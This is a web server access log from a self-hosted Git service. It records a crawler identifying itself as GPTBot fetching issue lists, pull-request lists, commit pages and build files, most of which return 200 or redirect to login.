git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13471] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:19:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2fBRIN%20%ec%84%a4%eb%aa%85.md" [Client 74.7.227.38] [Length 26246] [Gzip 5.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" -[17/Feb/2026:19:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11869] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11870] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13486] [Gzip 4.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9853] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11300] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11829] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" -[17/Feb/2026:19:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=source" [Client 74.7.227.38] [Length 22041] [Gzip 5.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" -[17/Feb/2026:19:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15636] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15662] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15661] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=closed&type=all" -[17/Feb/2026:19:16:46 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 157.245.110.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" -[17/Feb/2026:19:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 157.245.110.238] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" -[17/Feb/2026:19:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 